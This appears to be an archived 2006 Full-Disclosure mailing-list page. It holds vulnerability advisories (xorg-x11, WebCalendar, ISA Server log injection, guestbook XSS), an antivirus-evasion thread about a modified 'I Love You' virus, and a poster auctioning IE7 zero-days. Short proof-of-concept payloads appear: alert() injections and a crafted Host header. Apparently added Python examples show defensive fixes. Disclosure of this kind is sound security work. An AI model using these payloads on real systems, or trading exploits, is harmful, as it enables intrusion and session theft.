[Full-disclosure] [ MDKSA-2006:081-1 ] - Updated xorg-x11 packages fix vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
Mandriva Linux Security Advisory                         MDKSA-2006:081-1
http://www.mandriva.com/security/
___

Package : xorg-x11
Date    : May 4, 2006
Affected: 2006.0
___

Problem Description:

A problem was discovered in xorg-x11 where the X render extension would mis-calculate the size of a buffer, leading to an overflow that could possibly be exploited by clients of the X server.

Update:

Rafael Bermudez noticed that the patch for 2006 was mis-applied. This update resolves that issue.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1526
___

Updated Packages:

Mandriva Linux 2006.0:
fc3e3a6a825dd0ed259803f0ec585514 2006.0/RPMS/libxorg-x11-6.9.0-5.6.20060mdk.i586.rpm
d81df0a49bd2c7178e93229756009bfe 2006.0/RPMS/libxorg-x11-devel-6.9.0-5.6.20060mdk.i586.rpm
f48af91d6c0cac186af5459d7ab84aaf 2006.0/RPMS/libxorg-x11-static-devel-6.9.0-5.6.20060mdk.i586.rpm
61090a0da61aa8be2df3df679069fbcb 2006.0/RPMS/xorg-x11-100dpi-fonts-6.9.0-5.6.20060mdk.i586.rpm
76a44a4b56266c1a3782c437fa1f879a 2006.0/RPMS/xorg-x11-6.9.0-5.6.20060mdk.i586.rpm
93c2772c76d3c862d97b2e5b020e30a3 2006.0/RPMS/xorg-x11-75dpi-fonts-6.9.0-5.6.20060mdk.i586.rpm
e7e765f1477cb88637aae30fb50fe626 2006.0/RPMS/xorg-x11-cyrillic-fonts-6.9.0-5.6.20060mdk.i586.rpm
272c396e96c45676792a6a453c65e7a6 2006.0/RPMS/xorg-x11-doc-6.9.0-5.6.20060mdk.i586.rpm
f956116db27ef01ca1f1f73bd720149e 2006.0/RPMS/xorg-x11-glide-module-6.9.0-5.6.20060mdk.i586.rpm
d13be66590a678292d640625d40fa923 2006.0/RPMS/xorg-x11-server-6.9.0-5.6.20060mdk.i586.rpm
d6bda749c3aecfd11e143bcf2450967e 2006.0/RPMS/xorg-x11-xauth-6.9.0-5.6.20060mdk.i586.rpm
b3f05df67c81766894fa4adc6c9744fd 2006.0/RPMS/xorg-x11-Xdmx-6.9.0-5.6.20060mdk.i586.rpm
13b62b9ca1e8405c5b7fd4204a206a4c 2006.0/RPMS/xorg-x11-xfs-6.9.0-5.6.20060mdk.i586.rpm
7258f0fa58ea03ebe26d72e8f039eb82 2006.0/RPMS/xorg-x11-Xnest-6.9.0-5.6.20060mdk.i586.rpm
ae9801aa6faf4ab58cfaf8fc590a6133 2006.0/RPMS/xorg-x11-Xprt-6.9.0-5.6.20060mdk.i586.rpm
509555c18dbdb0337bd1d00e72c7bfd6 2006.0/RPMS/xorg-x11-Xvfb-6.9.0-5.6.20060mdk.i586.rpm
e333b8894ec5d3fbca38c95741d95935 2006.0/SRPMS/xorg-x11-6.9.0-5.6.20060mdk.src.rpm

Mandriva Linux 2006.0/X86_64:
505ab1a243407f7397e208a29228dd89 x86_64/2006.0/RPMS/lib64xorg-x11-6.9.0-5.6.20060mdk.x86_64.rpm
4e50a1d049a699571c6b509700721557 x86_64/2006.0/RPMS/lib64xorg-x11-devel-6.9.0-5.6.20060mdk.x86_64.rpm
955c4dbfaafe890868f60f34bf088da9 x86_64/2006.0/RPMS/lib64xorg-x11-static-devel-6.9.0-5.6.20060mdk.x86_64.rpm
fc3e3a6a825dd0ed259803f0ec585514 x86_64/2006.0/RPMS/libxorg-x11-6.9.0-5.6.20060mdk.i586.rpm
d81df0a49bd2c7178e93229756009bfe x86_64/2006.0/RPMS/libxorg-x11-devel-6.9.0-5.6.20060mdk.i586.rpm
f48af91d6c0cac186af5459d7ab84aaf x86_64/2006.0/RPMS/libxorg-x11-static-devel-6.9.0-5.6.20060mdk.i586.rpm
c7b65a75d52abde5e3634078eb84842d x86_64/2006.0/RPMS/X11R6-contrib-6.9.0-5.6.20060mdk.x86_64.rpm
caad39791829b2ef86bef852021c3490 x86_64/2006.0/RPMS/xorg-x11-100dpi-fonts-6.9.0-5.6.20060mdk.x86_64.rpm
d004173e376cd1fc441fb23d367fe597 x86_64/2006.0/RPMS/xorg-x11-6.9.0-5.6.20060mdk.x86_64.rpm
cd364f6c76eedfba39a10c4ddf81cfb0 x86_64/2006.0/RPMS/xorg-x11-75dpi-fonts-6.9.0-5.6.20060mdk.x86_64.rpm
1f6c50c0665c21a78b07d3440ffd43c2 x86_64/2006.0/RPMS/xorg-x11-cyrillic-fonts-6.9.0-5.6.20060mdk.x86_64.rpm
f135965f13fcc76d4ca07fa128bd7620 x86_64/2006.0/RPMS/xorg-x11-doc-6.9.0-5.6.20060mdk.x86_64.rpm
3304d60e7288911924951718c74afa30 x86_64/2006.0/RPMS/xorg-x11-glide-module-6.9.0-5.6.20060mdk.x86_64.rpm
2d73dbacee80e596f3dbdf0db8a5ffda x86_64/2006.0/RPMS/xorg-x11-server-6.9.0-5.6.20060mdk.x86_64.rpm
8793a61a6824c7ad5c0c8bffe4ce8ee5 x86_64/2006.0/RPMS/xorg-x11-xauth-6.9.0-5.6.20060mdk.x86_64.rpm
674f714d7fa826c12fb0b59429718d1f x86_64/2006.0/RPMS/xorg-x11-Xdmx-6.9.0-5.6.20060mdk.x86_64.rpm
a07559d45b7622c3c9b0eed36a6c1000 x86_64/2006.0/RPMS/xorg-x11-xfs-6.9.0-5.6.20060mdk.x86_64.rpm
87abf49419cc1417f56e45227034f7bf x86_64/2006.0/RPMS/xorg-x11-Xnest-6.9.0-5.6.20060mdk.x86_64.rpm
fcfcded879d21656bfddb8ecb91b47e2 x86_64/2006.0/RPMS/xorg-x11-Xprt-6.9.0-5.6.20060mdk.x86_64.rpm
efaeb4f777b5372d55fd8d9128bb80b6 x86_64/2006.0/RPMS/xorg-x11-Xvfb-6.9.0-5.6.20060mdk.x86_64.rpm
e333b8894ec5d3fbca38c95741d95935 x86_64/2006.0/SRPMS/xorg-x11-6.9.0-5.6.20060mdk.src.rpm
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All pa
Re: [Full-disclosure] IE7 Zero Day
Ahh and here come the clueless posts from those that have never found a vulnerability themselves. Sigh...

On Thu, 04 May 2006 21:51:50 -0700 "Randal T. Rioux" <[EMAIL PROTECTED]> wrote:
>[EMAIL PROTECTED] wrote:
>> If you are interested in bidding. I can provide you with an
>> account to provide the funds. Social Security numbers are for
>> American citizens only so don't assume I am such a person.
>>
>
>I'll start the bidding at $1.25 USD. Do you take checks?
>
>I have a slightly used half-liter bottle of Mountain Dew for trade if
>you're willing to barter.
>
>Let me know... I'm serious.
>
>Randy
>
>PS I found that the rotors on my Jeep wear down faster than they should.
>Does anyone know a contact at Daimler/Chrysler that would be interested
>in buying this vulnerability information? I don't have a fix yet though.

Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 Zero Day
[EMAIL PROTECTED] wrote:
> If you are interested in bidding. I can provide you with an
> account to provide the funds. Social Security numbers are for
> American citizens only so don't assume I am such a person.
>

I'll start the bidding at $1.25 USD. Do you take checks?

I have a slightly used half-liter bottle of Mountain Dew for trade if you're willing to barter.

Let me know... I'm serious.

Randy

PS I found that the rotors on my Jeep wear down faster than they should. Does anyone know a contact at Daimler/Chrysler that would be interested in buying this vulnerability information? I don't have a fix yet though.
Re: [Full-disclosure] IE7 Zero Day
If you are interested in bidding. I can provide you with an account to provide the funds. Social Security numbers are for American citizens only so don't assume I am such a person.

On Thu, 04 May 2006 20:58:26 -0700 Peter Besenbruch <[EMAIL PROTECTED]> wrote:
>[EMAIL PROTECTED] wrote:
>> As a spectator, I wonder who's going to bid on it, and how much, without any
>> clues as to what exactly the extent is (crash, code execution as user, code
>> exec as system, etc), or even any proof you have the goods.. ;)
>
>If the guy provided more information, such as his full name, address,
>and phone number, his bank account info, his social security number,
>that sort of thing, I might trust him. ;)
>--
>Hawaiian Astronomical Society: http://www.hawastsoc.org
>HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky
Re: [Full-disclosure] IE7 Zero Day
I can prove that I have "the goods" to those that are seriously interested in buying.

On Thu, 04 May 2006 19:26:53 -0700 [EMAIL PROTECTED] wrote:
>On Thu, 04 May 2006 16:46:28 PDT, [EMAIL PROTECTED] said:
>> Highest bidder that can convince me that you will actually pay
>> wins.
>
>As a spectator, I wonder who's going to bid on it, and how much, without any
>clues as to what exactly the extent is (crash, code execution as user, code
>exec as system, etc), or even any proof you have the goods.. ;)
Re: [Full-disclosure] IE7 Zero Day
[EMAIL PROTECTED] wrote:
> As a spectator, I wonder who's going to bid on it, and how much, without any
> clues as to what exactly the extent is (crash, code execution as user, code
> exec as system, etc), or even any proof you have the goods.. ;)

If the guy provided more information, such as his full name, address, and phone number, his bank account info, his social security number, that sort of thing, I might trust him. ;)
--
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky
Re: [Full-disclosure] IE7 Zero Day
On Thu, 04 May 2006 16:46:28 PDT, [EMAIL PROTECTED] said:
> Highest bidder that can convince me that you will actually pay
> wins.

As a spectator, I wonder who's going to bid on it, and how much, without any clues as to what exactly the extent is (crash, code execution as user, code exec as system, etc), or even any proof you have the goods.. ;)
Re: [Full-disclosure] How many vendors knowingly ship GA product with security vulnerabilities?
On Thu, 04 May 2006 18:15:18 PDT, Bill Stout said:
> That's an excellent and well thought out reply. Sounds like you have
> some experience in delivering software.

Not commercial software. However, commercial software ship dates are infinitely flexible compared to "30,000 students are showing up Tuesday and the class registration and housing checking systems *have* to be ready" ;)

> It would seem that if a few days buffer were built into the system,
> specifically to check in security fixes prior to QA; that would be a
> huge 'CYA' benefit to prevent those 'CLM' moves and to protect the
> consumers of the software.

Trust me - the original plan usually *starts* with *more* than "a few days buffer".

Recommended reading: "The Mythical Man Month" by Fred Brooks - what he learned as the project manager for IBM's OS/360 operating system development, which still ranks as one of the biggest software development projects in history. One of the famous quotes from it: "Adding programmers to late software projects makes them later"
[Full-disclosure] IE7 Information Disclosure - For sale
I just found a second bug that allows one to remotely retrieve the contents of other tabs inside of IE7. Again, for sale. Highest bidder.

Exploit example is to trick luser to visiting website which would then download contents of all open tabs including cookie and session information.
RE: [Full-disclosure] How many vendors knowingly ship GA product with security vulnerabilities?
Thanks Vladis,

That's an excellent and well thought out reply. Sounds like you have some experience in delivering software.

It would seem that if a few days buffer were built into the system, specifically to check in security fixes prior to QA; that would be a huge 'CYA' benefit to prevent those 'CLM' moves and to protect the consumers of the software.

Bill Stout

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Wednesday, May 03, 2006 11:10 PM
To: Bill Stout
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] How many vendors knowingly ship GA product with security vulnerabilities?

On Wed, 03 May 2006 22:23:42 PDT, Bill Stout said:
> If a patch is ready in just a few days, and QA for a patch takes several
> weeks, it would seem the vendor already knew about the vulnerability and
> had a fix ready, either for next release or vulnerability discovery,

It would *seem* that way, yes. But it often doesn't work that way. Quite often, the bug is a Homer Simpson "D'Oh!" error (such as most buffer overruns), so a "first cut" of a patch can be done in a few *hours*.

> which ever came first. Otherwise the fix would take weeks to test and
> release in order to test all compatibilities related to the bug fix,
> correct?

But it can *still* take a while to actually integrate and test the fix, especially if it involves an API change. For instance, a buffer overflow may be fixed by passing in a new "length" parameter. Then you have to find and fix all the places that call the function, to also pass the length, and then find all the places that call those places, and so far... And if you're *really* unlucky, the API change goes to multiple code repositories for multiple products... and things get *really* ugly.

Try it sometime - pull down the source for Firefox or OpenOffice, which are "average" sized for large software systems. Unpack it someplace (make sure you have multiple gigabytes of disk available). Now find some random foo.h file somewhere in the tree. Find a 'struct' in that .h, and add one more thing to that struct. 'int blat;' is good enough. Now see how long it takes you to find every use of that struct, and add a 'foo_struct.blat = 5;' (or 6, or 9, or different value at each use). Then have fun tracking down all the *implicit* uses - code that uses sizeof(), or places where the code blows up if 'sizeof(struct foo_struct)' is over the size you can store in a certain field in a database. Oh, and don't forget to find that XML file that generates the marshal/demarshal code for this ;)

> So, my question is, if the vendor knew about vulnerabilities before a
> product was released, why wouldn't they simply delay the ship a few days
> in order to QA the patch for vulnerabilities they already knew about?

There's this thing called a 'freeze date', and it's often several *months* before the planned 'ship date'. You have to freeze the code at *some* point, do the QA, and at some point produce a .ISO or similar to send to burn CDs. Then you have to send the CD off to be duplicated (even a *big* duplicating shop is going to take a while to produce 10,000,000 burned, custom artwork, manuals, into a box and shrink wrapped and sent to Office Max and Best Buy and Walmart and everyplace else. Oh, and you need to send copies to whatever PC manufacturers bundle it, so Dell and HP and Lenovo can integrate it into the images *they* install.

So you're sitting there, 3 million CD's burned, Dell and HP ramping up and Lenovo ready to go tomorrow - and you want to *delay a few days* because there might be a bug? Somebody's gonna *pay* for that fuck-up. It's a CLM (Career-Limiting Move).

http://today.reuters.com/business/newsArticle.aspx?type=technology&storyID=nN02271704

Vista is slipping *again*. And the news took MSFT stock down 0.22 to $24.07. That's a 1% hit in market value. And that means that Gates's $40B in MSFT stock just dropped $400M in value. That means Gates is gonna rip Ballmer a new one (wouldn't *you* if you just lost $400M?). Ballmer is gonna rip somebody a new one, and so on down the line. You wanna be the software engineer at the end of that line? You're gonna get ripped so many new ones, you're gonna be called "Swiss Cheese" at your next job...

And it's not limited to proprietary software either - the guys over at Firefox just released 1.5.0.3 to fix a nasty flaw. Now, *somebody* had to make the hard call "We ship 1.5.0.3 *now* to fix this bug, and the stuff that *was* targeted for 0.3 is going to slip to 0.4". Do you want to be the software engineer that tries to say "Umm.. can we hold 0.3 for a week and a half while we get these 3 minor bugfixes finished?"
Re: [Full-disclosure] IE7 Zero Day
What do you do for work? Are you paid to work with computers? Do not judge others and how they choose to make a living. I am doing nothing different than anyone else who has a skill and needs to support family. If you were smarter you wouldn't need me to share my knowledge in any way now would you?

On Thu, 04 May 2006 16:52:57 -0700 FRLinux <[EMAIL PROTECTED]> wrote:
>On 5/5/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
>> Highest bidder that can convince me that you will actually pay
>> wins.
>
>Whatever happened to sharing knowledge in a common way ... Honest, get
>a life ...
>
>Steph
Re: [Full-disclosure] IE7 Zero Day
On 5/5/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> Highest bidder that can convince me that you will actually pay wins.

Whatever happened to sharing knowledge in a common way ... Honest, get a life ...

Steph
[Full-disclosure] IE7 Zero Day
Yes, this is a beta product but I have reason to believe that this issue will not be discovered or fixed by M$ before it goes to gold. Why do I believe this? Because the issue is found in IE 6 but doesn't seem to exploit. Not saying it is not exploitable, I am saying that I can't make it exploit.

I work as a pizza delivery driver at night and work part time landscaping in my days. So I feel it is only fair that I be compensated for this vulnerability.

Highest bidder that can convince me that you will actually pay wins.
[Full-disclosure] WebCalendar User Account Enumeration Weakness
WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. See project homepage for details: http://www.k5n.us/webcalendar.php

Description:
The problem is that different error messages are returned depending on whether an unsuccessful login attempt is performed with a valid or invalid username in the login page.

Error message extract from 'includes/user.php' can be:
"Invalid login"
"Invalid login: incorrect password"
"Invalid login: no such user"

The weakness has been confirmed in version 1.0.1, 1.0.2, 1.0.3. Other versions may also be affected.

David Maciejak
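The weakness described above, as an added Python example (not WebCalendar's own PHP, and not David Maciejak's code): a login check that returns the three distinct messages quoted from includes/user.php, beside a hardened check that returns one uniform message and always runs the password hash so that timing does not reveal which branch was taken. The user store, the password and the function names are constructed for the demo.

```python
"""Added example: user-enumeration via distinct login error messages,
and the uniform-message fix. The user table below is constructed."""
import hashlib
import hmac
import os

ITERATIONS = 100_000  # PBKDF2 work factor, kept modest for the demo


def _make_record(password: str) -> tuple[bytes, bytes]:
    """Return (salt, PBKDF2-SHA256 hash) for a constructed user record."""
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: username -> (salt, hash). Only "alice" exists.
USERS = {"alice": _make_record("correct horse battery staple")}

# Record for a user who does not exist: verifying against it keeps the
# "no such user" path as expensive as the "wrong password" path.
_DUMMY_SALT, _DUMMY_HASH = _make_record(os.urandom(16).hex())


def _verify(salt: bytes, expected: bytes, password: str) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, expected)


def login_leaky(username: str, password: str) -> tuple[bool, str]:
    """Weak form: the message says whether the username exists (the strings
    are the ones the advisory quotes from includes/user.php)."""
    record = USERS.get(username)
    if record is None:
        return False, "Invalid login: no such user"
    if not _verify(record[0], record[1], password):
        return False, "Invalid login: incorrect password"
    return True, "OK"


def login_uniform(username: str, password: str) -> tuple[bool, str]:
    """Hardened form: one message for every failure, and exactly one hash
    computation whether or not the user exists."""
    salt, expected = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    ok = _verify(salt, expected, password) and username in USERS
    return (True, "OK") if ok else (False, "Invalid login")


def messages_distinguish_users(login) -> bool:
    """True when a failed login for an unknown user yields a different
    message than a failed login for a known user (the enumeration oracle)."""
    _, m_unknown = login("nobody", "x")
    _, m_known = login("alice", "wrong password")
    return m_unknown != m_known


if __name__ == "__main__":
    print("leaky form distinguishes users  :", messages_distinguish_users(login_leaky))
    print("uniform form distinguishes users:", messages_distinguish_users(login_uniform))
```

The same uniform wording has to be used in every failure branch, including account-locked and disabled-account paths; a single branch that differs reopens the oracle.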
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, NortonAntivirus 2005 and the virus
Guys, these are signature-based systems...

LET ME SHED SOME LIGHT ON THIS, ALL SIGNATURE-BASED SYSTEMS CAN BE SUBVERTED. THIS IS A KNOWN FACT PEOPLE HAVE BEEN DISCUSSING FOR YEARS.

Let me be the first to welcome you to the year 1999.

From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Thiago H. Pojda
Sent: Thursday, May 04, 2006 11:00 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure,NortonAntivirus 2005 and the virus

The major point of the thread is that some of the most popular AV scanners used in big companies, do not detect it. Yea, I did post that AVG scanner detected it. And also a few other people did the same with their AV scanners. And that is scary because even small or non-so-well-known av scanners detect a slight difference in a virus file and the oh-so-almighty ones don't.

On 5/4/06, Steven Rakick <[EMAIL PROTECTED]> wrote:
Great. Now we're going to have every freaking dork with an AV posting about how their system detected it.

GOOD WORK, FUCKO.

__
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
Re: [Full-disclosure] ISA Server 2004 Log Manipulation
3 days at 600 per second non stop = 86400 sec/day * 600 = 51 840 000 attempts.

after 51.8 million tries, the product was able to inject the numbers 1,2,3 into a parameter into a log that many see as non-critical. and it looks like you tried 1,2,3,4 but it only did 1,2,3.

c'mon. log manipulation should mean more than that, shouldn't it?

h.

beSIRT wrote:
> Discovered by: Noam Rathaus using the beSTORM fuzzer.
> Reported to vendor: December, 2005.
> Vendor response: Microsoft does not consider this issue to be a security
> vulnerability.
> Public release date: 4th of May, 2006.
>
> Advisory URL:
> http://www.beyondsecurity.com/besirt/advisories/042006-001-ISA-LM.txt
>
> Introduction
> There is a Log Manipulation vulnerability in Microsoft ISA Server 2004, which
> when exploited will enable a malicious user to manipulate the Destination
> Host parameter of the log file.
>
> Technical Details
> -----------------
> By sending the following request to the server:
>
> GET / HTTP/1.0
> Host: %01%02%03%04
> Transfer-Encoding: whatever
>
> We were able to insert arbitrary characters, in this case the ASCII characters
> 1, 2, 3 (respectively) into the Destination Host parameter of the log file.
>
> This has been found after 3 days of running the beSTORM fuzzer at 600+
> Sessions per Second while monitoring the ISA Server log file for problems.
>
> About ISA Server 2004
> ---------------------
> "Microsoft Internet Security and Acceleration (ISA) Server 2004 is the
> advanced stateful packet and application-layer inspection firewall, virtual
> private network (VPN), and Web cache solution that enables enterprise
> customers to easily maximize existing information technology (IT) investments
> by improving network security and performance."
>
> Product URL: http://www.microsoft.com/isaserver/default.mspx
>
> --
> beSIRT - Beyond Security's Incident Response Team
> [EMAIL PROTECTED]
> www.BeyondSecurity.com
Re: [Full-disclosure] ISA Server 2004 Log Manipulation
why do you consider this a vulnerability. the host parameter is client based and can't be trusted. many servers ignore it altogether

On 5/4/06, beSIRT <[EMAIL PROTECTED]> wrote:
> Discovered by: Noam Rathaus using the beSTORM fuzzer.
> Reported to vendor: December, 2005.
> Vendor response: Microsoft does not consider this issue to be a security
> vulnerability.
> Public release date: 4th of May, 2006.
>
> Advisory URL:
> http://www.beyondsecurity.com/besirt/advisories/042006-001-ISA-LM.txt
>
> Introduction
> There is a Log Manipulation vulnerability in Microsoft ISA Server 2004, which
> when exploited will enable a malicious user to manipulate the Destination
> Host parameter of the log file.
>
> Technical Details
> -----------------
> By sending the following request to the server:
>
> GET / HTTP/1.0
> Host: %01%02%03%04
> Transfer-Encoding: whatever
>
> We were able to insert arbitrary characters, in this case the ASCII characters
> 1, 2, 3 (respectively) into the Destination Host parameter of the log file.
>
> This has been found after 3 days of running the beSTORM fuzzer at 600+
> Sessions per Second while monitoring the ISA Server log file for problems.
>
> About ISA Server 2004
> ---------------------
> "Microsoft Internet Security and Acceleration (ISA) Server 2004 is the
> advanced stateful packet and application-layer inspection firewall, virtual
> private network (VPN), and Web cache solution that enables enterprise
> customers to easily maximize existing information technology (IT) investments
> by improving network security and performance."
>
> Product URL: http://www.microsoft.com/isaserver/default.mspx
>
> --
> beSIRT - Beyond Security's Incident Response Team
> [EMAIL PROTECTED]
> www.BeyondSecurity.com
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus "I Love You"
Symantec Antivirus detected and removed it as "VBS.LoveLetter.CI"
version 10.0.1.1000 engine 61.1.0.11 defs 2006/05/03 rev.18

----- Original Message -----
From: "Peter van den Houten" <[EMAIL PROTECTED]>
To:
Sent: Thursday, May 04, 2006 4:39 PM
Subject: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus "I Love You"

My ISP caught it:
-
The Orange virus filtering service discovered a virus or unauthorised code (e.g. spyware or trojan) in an email sent to you.

Message sender: [EMAIL PROTECTED]
Message recipient(s): [EMAIL PROTECTED]
Message subject: [Full-disclosure] RE: Panda Antivirus Enterprise Secure,
Message date: Thu, 4 May 2006 13:32:26 +0200 (CEST)
Message size: 8.84Kb

The e-mail contained this virus or unauthorized code:
>>> [VBS/LoveLetter-MM]

On 5/4/06, *Joxean Koret* <> wrote:
Sorry, the email was sent without the attachment.

---
Regards,
Joxean Koret

> Attached goes a working "I Love You" virus in which
> I
> changed ONLY the variable "dirsystem" with the name
> "kk2" (The file attached has the extension
> ".txt.gz",
> otherwise, with the .vbs extension the file will be
> locked by all the most popular anti-viral
> toolkits).

Disclaimer:
~~~
The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Contact: Joxean Koret at joxeanpiti@yah00
[Full-disclosure] bigwebmaster guestbook multiple XSS
Affected software: Bigwebmaster Guestbook version 1.02 and down
Vendor: http://www.bigwebmaster.com/Perl/Scripts_and_Programs/Guestbooks/

Introduction: (taken from vendor site)
This is one of the most powerful guestbooks that you will find on the internet. Visitors who come to your site will be able to leave comments and other general information about themselves. If you want to know what your visitors are thinking, and if you want a fully customizable script, this one is perfect for you. Features include template files to fit any website design, 9 standard fields, 9 extra fields (customizable), unlimited entries, and easy to use admin area. Full online demo available.

Vulnerability Details:
when adding a comment addguest.cgi accepts javascript code into mail, site, city, state and country fields which lead to javascript cross site scripting when viewguest.cgi is accessed for displaying the content of the guest book.

POC:
http://www.example.com/gb/addguest.cgi
name: xss
mail: [EMAIL PROTECTED] alert('XSS in mail');
site: http://www.example.com/ alert('XSS in site');
city: alert('XSS in city');
state: alert('XSS in state');
country: alert('XSS in country');

google search: intitle:Big Webmaster Guestbook

Vendor Status: NOT NOTIFIED
Solution: I DON'T CARE

Javor Ninov aka DrFrancky
http://www.securitydot.net/
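The stored XSS above is a missing-output-encoding bug: whatever addguest.cgi saves is written straight into the page by viewguest.cgi. As an added Python example (not the guestbook's own Perl code, nor Javor Ninov's), the rendering below escapes every user-supplied field before interpolation and only turns the site field into a link when it is an http(s) URL, with an unescaped renderer beside it for contrast and a checker that looks for raw active tags in the output. The field names follow the advisory; the entry, the page template and the function names are constructed for the demo.

```python
"""Added example: HTML-escaping guestbook fields on output (the fix for the
stored XSS described in the advisory). The entry below is constructed."""
import html
import re
from urllib.parse import urlsplit

FIELDS = ("name", "mail", "site", "city", "state", "country", "comment")

# Constructed entry of the shape the advisory describes: markup stored in
# several of the free-text fields and a non-http scheme in the site field.
ENTRY = {
    "name": "xss",
    "mail": "<script>alert('XSS in mail')</script>",
    "site": "javascript:alert('XSS in site')",
    "city": "<img src=x onerror=alert('XSS in city')>",
    "state": "<b>bold</b>",
    "country": "<script>alert('XSS in country')</script>",
    "comment": "hello & goodbye",
}


def safe_url(value: str) -> str:
    """Return an escaped http(s) URL with a host, or "" for anything else,
    so the site field can never become a javascript: or data: link."""
    parts = urlsplit(value.strip())
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return html.escape(value.strip(), quote=True)
    return ""


def render_entry_unsafe(entry: dict) -> str:
    """The vulnerable pattern: fields interpolated verbatim into the page."""
    e = {k: entry.get(k, "") for k in FIELDS}
    return (f'<div class="entry"><b>{e["name"]}</b> &lt;{e["mail"]}&gt; '
            f'from {e["city"]}, {e["state"]}, {e["country"]}<br>'
            f'<a href="{e["site"]}">{e["site"]}</a><p>{e["comment"]}</p></div>')


def render_entry(entry: dict) -> str:
    """Hardened form: every field escaped for an HTML text/attribute context,
    and the site field linked only when safe_url accepts it."""
    esc = {k: html.escape(entry.get(k, ""), quote=True) for k in FIELDS}
    site = safe_url(entry.get("site", ""))
    site_html = f'<a href="{site}">{site}</a>' if site else esc["site"]
    return (f'<div class="entry"><b>{esc["name"]}</b> &lt;{esc["mail"]}&gt; '
            f'from {esc["city"]}, {esc["state"]}, {esc["country"]}<br>'
            f'{site_html}<p>{esc["comment"]}</p></div>')


# Tags that can execute script or load remote content when left unescaped.
_ACTIVE_TAG_RE = re.compile(r"<\s*(script|img|iframe|object|embed|svg)\b", re.I)


def contains_active_markup(rendered: str) -> bool:
    """True if the rendered page still carries a raw active tag from input."""
    return bool(_ACTIVE_TAG_RE.search(rendered))


if __name__ == "__main__":
    print("unsafe render carries active markup:", contains_active_markup(render_entry_unsafe(ENTRY)))
    print("escaped render carries active markup:", contains_active_markup(render_entry(ENTRY)))
    print(render_entry(ENTRY))
```

Escaping has to happen at output, per context: html.escape with quote=True covers text nodes and double-quoted attributes, but a value placed inside a URL, a script block or an event handler needs that context's own encoding, which is why the site field is validated rather than merely escaped.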
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, NortonAntivirus 2005 and the virus
The major point of the thread is that some of the most popular AV scanners used in big companies, do not detect it. Yea, I did post that AVG scanner detected it. And also a few other people did the same with their AV scanners. And that is scary because even small or non-so-well-known av scanners detect a slight difference in a virus file and the oh-so-almighty ones don't.

On 5/4/06, Steven Rakick <[EMAIL PROTECTED]> wrote:
> Great. Now we're going to have every freaking dork
> with an AV posting about how their system detected it.
>
> GOOD WORK, FUCKO.

--
Thiago Henrique Pojda
Curitiba - PR
XX--xx--XX
"It is easy to have a secure computing system. You merely have to disconnect your system from any external network, and allow only terminals connected directly to it. Put the machine and its terminals in a locked room, and a guard at the door." F.T. Grampp and R.H. Morris
XX--xx--
IV Encontro Nacional dos Estudantes de Computação (4th National Meeting of Computing Students)
31 July to 4 August 2006 - Poços de Caldas - MG
http://www.enec.org.br/enecomp2006
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, NortonAntivirus 2005 and the virus
Great. Now we're going to have every freaking dork with an AV posting about how their system detected it.

GOOD WORK, FUCKO.
[Full-disclosure] RE: Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus "I Love You"
My ISP caught it:
-
The Orange virus filtering service discovered a virus or unauthorised code (e.g. spyware or trojan) in an email sent to you.

Message sender: [EMAIL PROTECTED]
Message recipient(s): [EMAIL PROTECTED]
Message subject: [Full-disclosure] RE: Panda Antivirus Enterprise Secure,
Message date: Thu, 4 May 2006 13:32:26 +0200 (CEST)
Message size: 8.84Kb

The e-mail contained this virus or unauthorized code:
>>> [VBS/LoveLetter-MM]

On 5/4/06, *Joxean Koret* <> wrote:
Sorry, the email was sent without the attachment.

---
Regards,
Joxean Koret

> Attached goes a working "I Love You" virus in which
> I
> changed ONLY the variable "dirsystem" with the name
> "kk2" (The file attached has the extension
> ".txt.gz",
> otherwise, with the .vbs extension the file will be
> locked by all the most popular anti-viral
> toolkits).

Disclaimer:
~~~
The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Contact: Joxean Koret at joxeanpiti@yah00
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus
The AV system (Vexira MailArmor version 2.x) of a local ISP detected it as VBS/Loveletter.B:

Subject: Virus havaittu / Virus found

*** Virus found from your email ***
Virusprotection software found the following virus from an email message sent to you:
VBS/Loveletter.B virus
